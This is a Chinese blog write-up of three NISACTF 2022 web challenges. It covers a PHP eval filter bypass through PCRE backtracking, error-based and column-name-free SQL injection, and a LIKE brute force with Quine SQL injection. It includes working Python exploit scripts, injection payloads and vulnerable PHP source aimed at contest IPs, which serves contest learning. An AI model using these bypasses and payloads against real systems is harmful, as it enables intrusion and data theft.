NISACTF2022公开通道(复现)

已于 2022-03-31 11:38:54 修改
阅读量4.7k 收藏 2
点赞数 1
分类专栏: Write Up 文章标签: 学习 web安全
于 2022-03-31 11:38:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123867861
版权

目录

middlerce(复现)

<?php
include "check.php";
if (isset($_REQUEST['letter'])){
    $txw4ever = $_REQUEST['letter'];
    if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
        die("再加把油喔");
    }
    else{
        $command = json_decode($txw4ever,true)['cmd'];
        checkdata($command);
        @eval($command);
    }
}
else{
    highlight_file(__FILE__);
}
?>

1、PCRE回溯次数限制绕过检测

2、checkdata函数检测绕过,下面是过滤字段

/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i

利用脚本如下

import requests
payload = '{"cmd":"?><?= `tail /f*`?>", "$":"'+"$"*(1000000) + '"}'
res = requests.post("http://1.14.71.254:28131/",data = {"letter":payload})
print(res.text)

join-us(复现)

知识点:报错注入 + 无列名注入

  • or被过滤用 ||代替

  • = 被过滤用like代替

  • database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名

    -1' || (select * from aa)#

  • column被过滤,用无列名注入

  • 输出长度限制,mid函数,substr函数

下面就是常规的操作

1、爆表名payload

tt=-1' || extractvalue(1,concat(0x07, (select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'), 0x07))#

2、爆列名

column被过滤了,这里要用到无列名注入的知识

  • 对一个新表起名字有三种方式
    • 一种是加个括号再加个名,如 (select*from output)c 那这个查询的结果内容就被归整为一个叫做“c”的表中;
    • 第二种就是直接用as,如 select output as a 那此时这个output就不叫output了,他叫 “a”;
    • 第三种就是这个as可以忽略

payload如下

tt=-1' || extractvalue(1,concat(0x07, (select * from(select * from output b join output c)a), 0x07))#

3、存在输出长度的限制

substr被过滤了,用mid函数来输出

mid函数的语法

MID(str,pos)

MID(str FROM pos)

MID(str,pos,len)

MID(str FROM pos FOR len)

payload如下

tt=-1' || extractvalue(1,concat(0x07, (select data from output), 0x07))#

tt=-1' || extractvalue(1,concat(0x07, mid((select data from output),28), 0x07))#

hardsql(复现)

like模糊匹配爆密码+Quine

1、like语法的学习

  • %MySQL最常用的通配符,它能代表任何长度的字符串,字符串的长度为0,,类似正则的中的*号,匹配的字符串必须加单引号或双引号

  • _只能代表单个字符,字符的长度不能为 0,如a_b可以匹配acb,adc等

  • LIKE 关键字匹配字符的时候是不区分大小写的。如果需要区分大小写,可以加入 BINARY 关键字

  • 注意大小写。MySQL 默认是不区分大小写的。如果区分大小写,像“Tom”这样的数据就不能被“t%”所匹配到。

  • 注意尾部空格,尾部空格会干扰通配符的匹配。例如,“T% ”就不能匹配到“Tom”。

  • 注意 NULL。“%”通配符可以到匹配任意字符,但是不能匹配 NULL。

写脚本爆密码

import requests
flag = ""
Str = "1234567890qwertyuiopasdfghjklzxcvbnm"
url = "http://1.14.71.254:28616/login.php"
for i in range(40):
    for j in Str:
        data = {"username":"bilala","passwd":"-1'/**/or/**/passwd/**/like/**/'{}%'#".format(flag+j)}
        response = requests.post(url, data=data)
        if b"wrong password" in response.content:
            flag = flag + j
            print(flag)
            break
print(flag)

登录之后看到源码

<?php
//多加了亿点点过滤

include_once("config.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
        alertMes('waf here', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
    $username=$_POST['username'];
    $password=$_POST['passwd'];
    if ($username !== 'bilala') {
        alertMes('only bilala can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
    $user_result=mysqli_query($MysqlLink,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes('nothing found','index.php');
    }
    if ($row['passwd'] === $password) {
        if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
            show_source(__FILE__);
            die;
        }
        else{
            die($FLAG);
        }
    } else {
        alertMes("wrong password",'index.php');
    }
}

?>

2、Quine注入学习

Quine又叫做自产生程序,在sql注入技术中,这是一种使得输入的sql语句和输出的sql语句一致的技术,常用于一些特殊的登陆绕过sql注入中

参考文章

一篇分析的很详细的参考文章

各个版本的Quine语句

分析Quine注入的payload

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#

关键函数 replace(object,search,replace),将object中的search字段替换成replace字段

  • 解决如何让输入和输出一致
  • 解决单双引号不同的情况

ps:0x、char、chr三个等价

Y3pro
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 581
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]hardsql
m0_70819573的博客
03-20 426
关键是它要求强比较相同,但弱比较不同,所以要用到Quine,Quine是一种自生产技术,可以使数据库输入和输出相同。3.当失败时会回显nothing found,以此可以爆破密码。爆破出密码登入后没有给flag,而是给了源码。1.打开环境,发现一个登录窗口。
NSSCTF-Web题目6
最新发布
weixin_54055099的博客
06-06 1081
NSSCTFweb题目
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 397
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
[NISACTF 2022]
snowlyzz的博客
09-09 6083
NISACTF部分WP
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
何凯明法_导向滤波_暗通道去雾先验复现_
10-04
在图像处理领域,"何凯明法_导向滤波_暗通道去雾先验复现_"这个标题涉及到了几个关键的技术点,主要包括何凯明的暗通道先验去雾算法、导向滤波以及代码的复现过程。这些技术都是图像增强和恢复的重要组成部分,对于...
CVE-2022-28525复现文档(巨详细,零基础复现
10-14
CVE-2022-28525 复现文档 本文档旨在详细介绍 CVE-2022-28525 的复现过程,涵盖了靶场的设置、用户名和密码的爆破、木马的上传、文件上传的修改、终端连接等多个方面,旨在帮助读者深入理解漏洞的原理和利用方法。 ...
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4447
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
[NISACTF 2022]下
qq_62046696的博客
07-30 2430
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]上
qq_62046696的博客
07-26 3637
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
SQL注入之Quine注入
Aiwin的博客
06-29 2625
SQL注入之Quine注入
[NISACTF 2022]middlerce
m0_70819573的博客
03-08 468
preg_match过滤了换行符和异或符号,所以考虑利用preg_match本身回身回溯超过1000000会返回false绕过。1.eval的执行逻辑和create_function或有相似之处,绕过方式几乎一样。2.很显然需要做fuzz测试。1.打开环境,审计代码。
[NISACTF 2022]middlerce-----正则匹配回溯绕过
qq_73767109的博客
06-26 798
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。2.到a这个字符从后面往前回溯匹配,先吐出一个d但匹配不上,继续吐出一个s,sd还是与a匹配不上。这个字符表示可以匹配任意的字符,那么按上面说的匹配机制,
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 3458
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
[NISACTF 2022]join-us
m0_70819573的博客
03-14 243
其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。接下来column被ban了,所以用无列注入,join题目也有提示。进入登录界面,发现sql注入窗口,首先进行fuzz测试。最后用mid或reverse函数读取flag。爆出表Fal_flag,output。
CVE-2022-47412复现
07-28
很抱歉,但我无法提供关于CVE-2022-47412的信息。 #### 引用[.reference_title] - *1* *2* *3* [Windows CVE-2022-21907和CVE-2022-21970复现以及分析](https://blog.csdn.net/Lab0431/article/details/122942736)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值